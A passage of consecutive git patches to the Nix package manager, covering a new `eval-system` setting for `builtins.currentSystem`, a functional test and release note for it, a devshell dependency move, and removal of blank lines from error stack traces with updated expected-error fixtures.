+ */ + const std::string & getCurrentSystem(); + Setting restrictEval{ this, false, "restrict-eval", R"( diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 89d5492da..d78a28c73 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4383,13 +4383,16 @@ void EvalState::createBaseEnv() .impureOnly = true, }); - if (!evalSettings.pureEval) { - v.mkString(settings.thisSystem.get()); - } + if (!evalSettings.pureEval) + v.mkString(evalSettings.getCurrentSystem()); addConstant("__currentSystem", v, { .type = nString, .doc = R"( - The value of the [`system` configuration option](@docroot@/command-ref/conf-file.md#conf-system). + The value of the + [`eval-system`](@docroot@/command-ref/conf-file.md#conf-eval-system) + or else + [`system`](@docroot@/command-ref/conf-file.md#conf-system) + configuration option. It can be used to set the `system` attribute for [`builtins.derivation`](@docroot@/language/derivations.md) such that the resulting derivation can be built on the same system that evaluates the Nix expression: diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index df977e294..e28615cdc 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -214,7 +214,11 @@ public: In general, you do not have to modify this setting. While you can force Nix to run a Darwin-specific `builder` executable on a Linux machine, the result would obviously be wrong. - This value is available in the Nix language as [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem). + This value is available in the Nix language as + [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem) + if the + [`eval-system`](#conf-eval-system) + configuration option is set as the empty string. 
)"}; Setting maxSilentTime{ diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 384d9924b..31b1b49ae 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -1,6 +1,7 @@ #include #include +#include "eval-settings.hh" #include "memory-input-accessor.hh" #include "tests/libexpr.hh" @@ -631,7 +632,7 @@ namespace nix { TEST_F(PrimOpTest, currentSystem) { auto v = eval("builtins.currentSystem"); - ASSERT_THAT(v, IsStringEq(settings.thisSystem.get())); + ASSERT_THAT(v, IsStringEq(evalSettings.getCurrentSystem())); } TEST_F(PrimOpTest, derivation) { From 70f50cbb2aa35f1ad1e38c9c73a5f8267baac17d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 19:47:10 -0500 Subject: [PATCH 125/654] Functional Test for `builtins.storeDir` and `builtins.currentSystem` These were under-tested. This tests the status quo and especially previous commit of this PR better. --- tests/functional/impure-eval.sh | 35 +++++++++++++++++++++++++++++++++ tests/functional/local.mk | 1 + 2 files changed, 36 insertions(+) create mode 100644 tests/functional/impure-eval.sh diff --git a/tests/functional/impure-eval.sh b/tests/functional/impure-eval.sh new file mode 100644 index 000000000..6c72f01d7 --- /dev/null +++ b/tests/functional/impure-eval.sh @@ -0,0 +1,35 @@ +source common.sh + +export REMOTE_STORE="dummy://" + +simpleTest () { + local expr=$1; shift + local result=$1; shift + # rest, extra args + + [[ "$(nix eval --impure --raw "$@" --expr "$expr")" == "$result" ]] +} + +# `builtins.storeDir` + +## Store dir follows `store` store setting +simpleTest 'builtins.storeDir' '/foo' --store "$REMOTE_STORE?store=/foo" +simpleTest 'builtins.storeDir' '/bar' --store "$REMOTE_STORE?store=/bar" + +# `builtins.currentSystem` + +## `system` alone affects by default +simpleTest 'builtins.currentSystem' 'foo' --system 'foo' +simpleTest 'builtins.currentSystem' 'bar' --system 'bar' + +## `system` affects if `eval-system` is an empty string 
+simpleTest 'builtins.currentSystem' 'foo' --system 'foo' --eval-system '' +simpleTest 'builtins.currentSystem' 'bar' --system 'bar' --eval-system '' + +## `eval-system` alone affects +simpleTest 'builtins.currentSystem' 'foo' --eval-system 'foo' +simpleTest 'builtins.currentSystem' 'bar' --eval-system 'bar' + +## `eval-system` overrides `system` +simpleTest 'builtins.currentSystem' 'bar' --system 'foo' --eval-system 'bar' +simpleTest 'builtins.currentSystem' 'baz' --system 'foo' --eval-system 'baz' diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 10b399d75..192e275e3 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -71,6 +71,7 @@ nix_tests = \ build-remote-trustless-should-fail-0.sh \ build-remote-with-mounted-ssh-ng.sh \ nar-access.sh \ + impure-eval.sh \ pure-eval.sh \ eval.sh \ repl.sh \ From 228e995cde0f059e4edebdfc8f46d3389d2dc135 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 19:53:59 -0500 Subject: [PATCH 126/654] Add release not for `eval-system` --- doc/manual/rl-next/eval-system.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 doc/manual/rl-next/eval-system.md diff --git a/doc/manual/rl-next/eval-system.md b/doc/manual/rl-next/eval-system.md new file mode 100644 index 000000000..a4696a56c --- /dev/null +++ b/doc/manual/rl-next/eval-system.md @@ -0,0 +1,12 @@ +--- +synopsis: Add new `eval-system` setting +prs: 4093 +--- + +Add a new `eval-system` option. +Unlike `system`, it just overrides the value of `builtins.currentSystem`. +This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. +In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + +`eval-system` only takes effect if it is non-empty. +If empty (the default) `system` is used as before, so there is no breakage. 
From 66d37b73383e40f0362b82a0e29c60d2913d689a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Fri, 15 Dec 2023 12:41:38 +0100 Subject: [PATCH 127/654] Move clang dev deps to the nix devshell override --- flake.nix | 5 ++++- package.nix | 4 ---- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index eb3846564..8c4436729 100644 --- a/flake.nix +++ b/flake.nix @@ -395,7 +395,7 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (_: { + makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (attrs: { installFlags = "sysconfdir=$(out)/etc"; shellHook = '' PATH=$prefix/bin:$PATH @@ -405,6 +405,9 @@ # Make bash completion work. XDG_DATA_DIRS+=:$out/share ''; + nativeBuildInputs = attrs.nativeBuildInputs or [] + ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear + ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools; }); in forAllSystems (system: diff --git a/package.nix b/package.nix index 6ea5bf9c9..24395b484 100644 --- a/package.nix +++ b/package.nix @@ -5,7 +5,6 @@ , autoreconfHook , aws-sdk-cpp , boehmgc -, buildPackages , nlohmann_json , bison , boost @@ -208,9 +207,6 @@ in { # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen - - ++ lib.optional stdenv.cc.isClang buildPackages.bear - ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) buildPackages.clang-tools ; buildInputs = lib.optionals doBuild [ From 5cb98095ba2c3de83d32c1729da7b9f6cfb1aeff Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 15 Dec 2023 23:56:17 -0800 Subject: [PATCH 128/654] Remove some blank lines from stack traces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This keeps hint messages, source location information, and source 
code snippets grouped together, while making stack traces shorter (so that more stack frames can be viewed on the same terminal). Before: error: … while evaluating the attribute 'body' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: 3| 4| body = x "x"; | ^ 5| } … from call site at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:10: 3| 4| body = x "x"; | ^ 5| } … while calling 'x' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:7: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| After: error: … while evaluating the attribute 'body' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: 3| 4| body = x "x"; | ^ 5| } … from call site at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:10: 3| 4| body = x "x"; | ^ 5| } … while calling 'x' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:7: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| --- src/libutil/error.cc | 3 +-- tests/functional/lang/eval-fail-abort.err.exp | 2 -- ...il-addDrvOutputDependencies-empty-context.err.exp | 2 -- ...dDrvOutputDependencies-multi-elem-context.err.exp | 2 -- ...dDrvOutputDependencies-wrong-element-kind.err.exp | 2 -- tests/functional/lang/eval-fail-assert.err.exp | 8 -------- .../functional/lang/eval-fail-attr-name-type.err.exp | 4 ---- .../eval-fail-bad-string-interpolation-1.err.exp | 2 -- .../eval-fail-bad-string-interpolation-3.err.exp | 2 -- .../eval-fail-bad-string-interpolation-4.err.exp | 2 -- tests/functional/lang/eval-fail-blackhole.err.exp | 4 ---- tests/functional/lang/eval-fail-call-primop.err.exp | 2 -- 
tests/functional/lang/eval-fail-deepseq.err.exp | 6 ------ .../lang/eval-fail-dup-dynamic-attrs.err.exp | 4 ---- ...al-fail-foldlStrict-strict-op-application.err.exp | 8 -------- .../lang/eval-fail-fromTOML-timestamps.err.exp | 2 -- .../lang/eval-fail-hashfile-missing.err.exp | 2 -- tests/functional/lang/eval-fail-list.err.exp | 2 -- tests/functional/lang/eval-fail-missing-arg.err.exp | 4 ---- tests/functional/lang/eval-fail-not-throws.err.exp | 4 ---- tests/functional/lang/eval-fail-path-slash.err.exp | 2 -- tests/functional/lang/eval-fail-recursion.err.exp | 4 ---- tests/functional/lang/eval-fail-remove.err.exp | 4 ---- tests/functional/lang/eval-fail-scope-5.err.exp | 8 -------- tests/functional/lang/eval-fail-seq.err.exp | 4 ---- tests/functional/lang/eval-fail-set.err.exp | 2 -- tests/functional/lang/eval-fail-substring.err.exp | 2 -- tests/functional/lang/eval-fail-to-path.err.exp | 2 -- tests/functional/lang/eval-fail-toJSON.err.exp | 12 ------------ .../functional/lang/eval-fail-undeclared-arg.err.exp | 4 ---- .../lang/eval-fail-using-set-as-attr-name.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-1.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-2.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-3.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-4.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-7.err.exp | 2 -- tests/functional/lang/parse-fail-dup-formals.err.exp | 2 -- .../functional/lang/parse-fail-eof-in-string.err.exp | 2 -- .../lang/parse-fail-mixed-nested-attrs1.err.exp | 2 -- .../lang/parse-fail-mixed-nested-attrs2.err.exp | 2 -- tests/functional/lang/parse-fail-patterns-1.err.exp | 2 -- .../lang/parse-fail-regression-20060610.err.exp | 2 -- tests/functional/lang/parse-fail-undef-var-2.err.exp | 2 -- tests/functional/lang/parse-fail-undef-var.err.exp | 2 -- tests/functional/lang/parse-fail-utf8.err.exp | 2 -- 45 files changed, 1 insertion(+), 140 deletions(-) diff --git a/src/libutil/error.cc 
b/src/libutil/error.cc index 72c346cb5..bc0194d59 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -173,10 +173,9 @@ static bool printUnknownLocations = getEnv("_NIX_EVAL_SHOW_UNKNOWN_LOCATIONS").h static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { bool hasPos = pos && *pos; if (hasPos) { - oss << "\n" << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; + oss << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; if (auto loc = pos->getCodeLines()) { - oss << "\n"; printCodeLines(oss, "", *pos, *loc); oss << "\n"; } diff --git a/tests/functional/lang/eval-fail-abort.err.exp b/tests/functional/lang/eval-fail-abort.err.exp index 345232d3f..20e7b9e18 100644 --- a/tests/functional/lang/eval-fail-abort.err.exp +++ b/tests/functional/lang/eval-fail-abort.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'abort' builtin - at /pwd/lang/eval-fail-abort.nix:1:14: - 1| if true then abort "this should fail" else 1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp index ad91a22aa..37e0bd9ee 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp +++ b/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-empty-context.nix:1:1: - 1| builtins.addDrvOutputDependencies "" | ^ 2| diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp index bb389db4e..6828e03c8 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp +++ 
b/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.nix:18:4: - 17| 18| in builtins.addDrvOutputDependencies combo-path | ^ diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp index 070381118..72b5e6368 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp +++ b/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.nix:9:4: - 8| 9| in builtins.addDrvOutputDependencies drv.outPath | ^ diff --git a/tests/functional/lang/eval-fail-assert.err.exp b/tests/functional/lang/eval-fail-assert.err.exp index aeecd8167..0656ec81c 100644 --- a/tests/functional/lang/eval-fail-assert.err.exp +++ b/tests/functional/lang/eval-fail-assert.err.exp @@ -1,35 +1,27 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-assert.nix:4:3: - 3| 4| body = x "x"; | ^ 5| } … from call site - at /pwd/lang/eval-fail-assert.nix:4:10: - 3| 4| body = x "x"; | ^ 5| } … while calling 'x' - at /pwd/lang/eval-fail-assert.nix:2:7: - 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed - at /pwd/lang/eval-fail-assert.nix:2:12: - 1| let { 2| x = arg: assert arg == "y"; 123; | ^ diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index 5f9a073dd..23cceb58a 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'puppy."${key}"' - 
at /pwd/lang/eval-fail-attr-name-type.nix:3:5: - 2| attrs = { 3| puppy.doggy = {}; | ^ 4| }; … while evaluating an attribute name - at /pwd/lang/eval-fail-attr-name-type.nix:7:17: - 6| in 7| attrs.puppy.${key} | ^ diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index eb73e9a52..b461b2e02 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-1.nix:1:2: - 1| "${x: x}" | ^ 2| diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index ac14f329b..95f4c2460 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-3.nix:1:3: - 1| ''${x: x}'' | ^ 2| diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 07843a480..4950f8ddb 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-4.nix:9:3: - 8| # The error message should not be too long. 
9| ''${pkgs}'' | ^ diff --git a/tests/functional/lang/eval-fail-blackhole.err.exp b/tests/functional/lang/eval-fail-blackhole.err.exp index f0618d8ac..95e33a5fe 100644 --- a/tests/functional/lang/eval-fail-blackhole.err.exp +++ b/tests/functional/lang/eval-fail-blackhole.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-blackhole.nix:2:3: - 1| let { 2| body = x; | ^ 3| x = y; error: infinite recursion encountered - at /pwd/lang/eval-fail-blackhole.nix:3:7: - 2| body = x; 3| x = y; | ^ diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp index 19b407c47..ae5b55ed4 100644 --- a/tests/functional/lang/eval-fail-call-primop.err.exp +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'length' builtin - at /pwd/lang/eval-fail-call-primop.nix:1:1: - 1| builtins.length 1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-deepseq.err.exp b/tests/functional/lang/eval-fail-deepseq.err.exp index 5e204ba73..11b62340d 100644 --- a/tests/functional/lang/eval-fail-deepseq.err.exp +++ b/tests/functional/lang/eval-fail-deepseq.err.exp @@ -1,24 +1,18 @@ error: … while calling the 'deepSeq' builtin - at /pwd/lang/eval-fail-deepseq.nix:1:1: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| … while evaluating the attribute 'x' - at /pwd/lang/eval-fail-deepseq.nix:1:20: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| … while calling the 'abort' builtin - at /pwd/lang/eval-fail-deepseq.nix:1:24: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| diff --git a/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp b/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp index c5fa67523..834f9c67b 100644 --- a/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp +++ b/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'set' - at 
/pwd/lang/eval-fail-dup-dynamic-attrs.nix:2:3: - 1| { 2| set = { "${"" + "b"}" = 1; }; | ^ 3| set = { "${"b" + ""}" = 2; }; error: dynamic attribute 'b' already defined at /pwd/lang/eval-fail-dup-dynamic-attrs.nix:2:11 - at /pwd/lang/eval-fail-dup-dynamic-attrs.nix:3:11: - 2| set = { "${"" + "b"}" = 1; }; 3| set = { "${"b" + ""}" = 2; }; | ^ diff --git a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp index 0069285fb..7cb08af8a 100644 --- a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp +++ b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp @@ -1,35 +1,27 @@ error: … while calling the 'foldl'' builtin - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:2:1: - 1| # Tests that the result of applying op is forced even if the value is never used 2| builtins.foldl' | ^ 3| (_: f: f null) … while calling anonymous lambda - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:3:7: - 2| builtins.foldl' 3| (_: f: f null) | ^ 4| null … from call site - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:3:10: - 2| builtins.foldl' 3| (_: f: f null) | ^ 4| null … while calling anonymous lambda - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:5:6: - 4| null 5| [ (_: throw "Not the final value, but is still forced!") (_: 23) ] | ^ diff --git a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp index 5b60d253d..73f9df8cc 100644 --- a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp +++ b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'fromTOML' builtin - at /pwd/lang/eval-fail-fromTOML-timestamps.nix:1:1: - 1| builtins.fromTOML '' | ^ 2| key = "value" diff --git a/tests/functional/lang/eval-fail-hashfile-missing.err.exp 
b/tests/functional/lang/eval-fail-hashfile-missing.err.exp index 6d38608c0..1e4653927 100644 --- a/tests/functional/lang/eval-fail-hashfile-missing.err.exp +++ b/tests/functional/lang/eval-fail-hashfile-missing.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'toString' builtin - at /pwd/lang/eval-fail-hashfile-missing.nix:4:3: - 3| in 4| toString (builtins.concatLists (map (hash: map (builtins.hashFile hash) paths) ["md5" "sha1" "sha256" "sha512"])) | ^ diff --git a/tests/functional/lang/eval-fail-list.err.exp b/tests/functional/lang/eval-fail-list.err.exp index 24d682118..4320fc022 100644 --- a/tests/functional/lang/eval-fail-list.err.exp +++ b/tests/functional/lang/eval-fail-list.err.exp @@ -1,8 +1,6 @@ error: … while evaluating one of the elements to concatenate - at /pwd/lang/eval-fail-list.nix:1:2: - 1| 8++1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-missing-arg.err.exp b/tests/functional/lang/eval-fail-missing-arg.err.exp index 61fabf0d5..3b162fe1b 100644 --- a/tests/functional/lang/eval-fail-missing-arg.err.exp +++ b/tests/functional/lang/eval-fail-missing-arg.err.exp @@ -1,16 +1,12 @@ error: … from call site - at /pwd/lang/eval-fail-missing-arg.nix:1:1: - 1| ({x, y, z}: x + y + z) {x = "foo"; z = "bar";} | ^ 2| error: function 'anonymous lambda' called without required argument 'y' - at /pwd/lang/eval-fail-missing-arg.nix:1:2: - 1| ({x, y, z}: x + y + z) {x = "foo"; z = "bar";} | ^ 2| diff --git a/tests/functional/lang/eval-fail-not-throws.err.exp b/tests/functional/lang/eval-fail-not-throws.err.exp index b290afb0a..fc81f7277 100644 --- a/tests/functional/lang/eval-fail-not-throws.err.exp +++ b/tests/functional/lang/eval-fail-not-throws.err.exp @@ -1,16 +1,12 @@ error: … in the argument of the not operator - at /pwd/lang/eval-fail-not-throws.nix:1:4: - 1| ! (throw "uh oh!") | ^ 2| … while calling the 'throw' builtin - at /pwd/lang/eval-fail-not-throws.nix:1:4: - 1| ! 
(throw "uh oh!") | ^ 2| diff --git a/tests/functional/lang/eval-fail-path-slash.err.exp b/tests/functional/lang/eval-fail-path-slash.err.exp index f0011c97f..e3531d352 100644 --- a/tests/functional/lang/eval-fail-path-slash.err.exp +++ b/tests/functional/lang/eval-fail-path-slash.err.exp @@ -1,7 +1,5 @@ error: path has a trailing slash - at /pwd/lang/eval-fail-path-slash.nix:6:12: - 5| # and https://nixos.org/nix-dev/2016-June/020829.html 6| /nix/store/ | ^ diff --git a/tests/functional/lang/eval-fail-recursion.err.exp b/tests/functional/lang/eval-fail-recursion.err.exp index af64133cb..19380dc65 100644 --- a/tests/functional/lang/eval-fail-recursion.err.exp +++ b/tests/functional/lang/eval-fail-recursion.err.exp @@ -1,16 +1,12 @@ error: … in the right operand of the update (//) operator - at /pwd/lang/eval-fail-recursion.nix:1:12: - 1| let a = {} // a; in a.foo | ^ 2| error: infinite recursion encountered - at /pwd/lang/eval-fail-recursion.nix:1:15: - 1| let a = {} // a; in a.foo | ^ 2| diff --git a/tests/functional/lang/eval-fail-remove.err.exp b/tests/functional/lang/eval-fail-remove.err.exp index e82cdac98..292b3c3f3 100644 --- a/tests/functional/lang/eval-fail-remove.err.exp +++ b/tests/functional/lang/eval-fail-remove.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-remove.nix:4:3: - 3| 4| body = (removeAttrs attrs ["x"]).x; | ^ 5| } error: attribute 'x' missing - at /pwd/lang/eval-fail-remove.nix:4:10: - 3| 4| body = (removeAttrs attrs ["x"]).x; | ^ diff --git a/tests/functional/lang/eval-fail-scope-5.err.exp b/tests/functional/lang/eval-fail-scope-5.err.exp index 22b6166f8..b0b05cad7 100644 --- a/tests/functional/lang/eval-fail-scope-5.err.exp +++ b/tests/functional/lang/eval-fail-scope-5.err.exp @@ -1,35 +1,27 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-scope-5.nix:8:3: - 7| 8| body = f {}; | ^ 9| … from call site - at /pwd/lang/eval-fail-scope-5.nix:8:10: - 7| 8| body = f {}; 
| ^ 9| … while calling 'f' - at /pwd/lang/eval-fail-scope-5.nix:6:7: - 5| 6| f = {x ? y, y ? x}: x + y; | ^ 7| error: infinite recursion encountered - at /pwd/lang/eval-fail-scope-5.nix:6:12: - 5| 6| f = {x ? y, y ? x}: x + y; | ^ diff --git a/tests/functional/lang/eval-fail-seq.err.exp b/tests/functional/lang/eval-fail-seq.err.exp index 33a7e9491..3e3d71b15 100644 --- a/tests/functional/lang/eval-fail-seq.err.exp +++ b/tests/functional/lang/eval-fail-seq.err.exp @@ -1,16 +1,12 @@ error: … while calling the 'seq' builtin - at /pwd/lang/eval-fail-seq.nix:1:1: - 1| builtins.seq (abort "foo") 2 | ^ 2| … while calling the 'abort' builtin - at /pwd/lang/eval-fail-seq.nix:1:15: - 1| builtins.seq (abort "foo") 2 | ^ 2| diff --git a/tests/functional/lang/eval-fail-set.err.exp b/tests/functional/lang/eval-fail-set.err.exp index 0d0140508..6dd646e11 100644 --- a/tests/functional/lang/eval-fail-set.err.exp +++ b/tests/functional/lang/eval-fail-set.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'x' - at /pwd/lang/eval-fail-set.nix:1:3: - 1| 8.x | ^ 2| diff --git a/tests/functional/lang/eval-fail-substring.err.exp b/tests/functional/lang/eval-fail-substring.err.exp index 5c58be29a..0457a826e 100644 --- a/tests/functional/lang/eval-fail-substring.err.exp +++ b/tests/functional/lang/eval-fail-substring.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'substring' builtin - at /pwd/lang/eval-fail-substring.nix:1:1: - 1| builtins.substring (builtins.sub 0 1) 1 "x" | ^ 2| diff --git a/tests/functional/lang/eval-fail-to-path.err.exp b/tests/functional/lang/eval-fail-to-path.err.exp index 4ffa2cf6d..d6b17be99 100644 --- a/tests/functional/lang/eval-fail-to-path.err.exp +++ b/tests/functional/lang/eval-fail-to-path.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'toPath' builtin - at /pwd/lang/eval-fail-to-path.nix:1:1: - 1| builtins.toPath "foo/bar" | ^ 2| diff --git a/tests/functional/lang/eval-fail-toJSON.err.exp b/tests/functional/lang/eval-fail-toJSON.err.exp index 
4e618c203..4f6003437 100644 --- a/tests/functional/lang/eval-fail-toJSON.err.exp +++ b/tests/functional/lang/eval-fail-toJSON.err.exp @@ -1,25 +1,19 @@ error: … while calling the 'toJSON' builtin - at /pwd/lang/eval-fail-toJSON.nix:1:1: - 1| builtins.toJSON { | ^ 2| a.b = [ … while evaluating attribute 'a' - at /pwd/lang/eval-fail-toJSON.nix:2:3: - 1| builtins.toJSON { 2| a.b = [ | ^ 3| true … while evaluating attribute 'b' - at /pwd/lang/eval-fail-toJSON.nix:2:3: - 1| builtins.toJSON { 2| a.b = [ | ^ @@ -28,27 +22,21 @@ error: … while evaluating list element at index 3 … while evaluating attribute 'c' - at /pwd/lang/eval-fail-toJSON.nix:7:7: - 6| { 7| c.d = throw "hah no"; | ^ 8| } … while evaluating attribute 'd' - at /pwd/lang/eval-fail-toJSON.nix:7:7: - 6| { 7| c.d = throw "hah no"; | ^ 8| } … while calling the 'throw' builtin - at /pwd/lang/eval-fail-toJSON.nix:7:13: - 6| { 7| c.d = throw "hah no"; | ^ diff --git a/tests/functional/lang/eval-fail-undeclared-arg.err.exp b/tests/functional/lang/eval-fail-undeclared-arg.err.exp index 30db743c7..6e13a138e 100644 --- a/tests/functional/lang/eval-fail-undeclared-arg.err.exp +++ b/tests/functional/lang/eval-fail-undeclared-arg.err.exp @@ -1,16 +1,12 @@ error: … from call site - at /pwd/lang/eval-fail-undeclared-arg.nix:1:1: - 1| ({x, z}: x + z) {x = "foo"; y = "bla"; z = "bar";} | ^ 2| error: function 'anonymous lambda' called with unexpected argument 'y' - at /pwd/lang/eval-fail-undeclared-arg.nix:1:2: - 1| ({x, z}: x + z) {x = "foo"; y = "bla"; z = "bar";} | ^ 2| diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 811d01b03..0a4f56ac5 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -1,8 